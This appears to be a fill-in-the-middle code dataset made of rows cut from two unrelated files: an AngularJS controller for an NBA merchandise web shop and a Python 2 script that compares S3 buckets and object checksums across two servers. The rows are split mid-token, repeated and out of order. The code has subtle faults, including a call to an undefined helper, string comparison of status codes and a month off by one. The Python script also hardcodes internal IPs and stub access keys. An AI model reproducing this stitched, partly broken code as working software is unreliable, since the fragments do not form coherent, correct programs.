$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_name |
||
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
//设置post请求的响应头部
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
//设置根控制器
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
//跳转到该路由时先判断屏幕宽度;
$rootScope.userId=1;//用来保存用户的id;
$rootScope.userName="lijun";//用户名;后续功能完善后在删除
$rootScope.pclass="";//查询商品类别;
$rootScope.searchMsg={};//查询信息
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];//分页数字数组
$rootScope.len=8;//每页记录数
$rootScope.proList=[];//保存商品列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime)); | //转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
} | $scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
}) | random_line_split |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = r | tMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
| e.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def ge | identifier_body |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarke | , markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
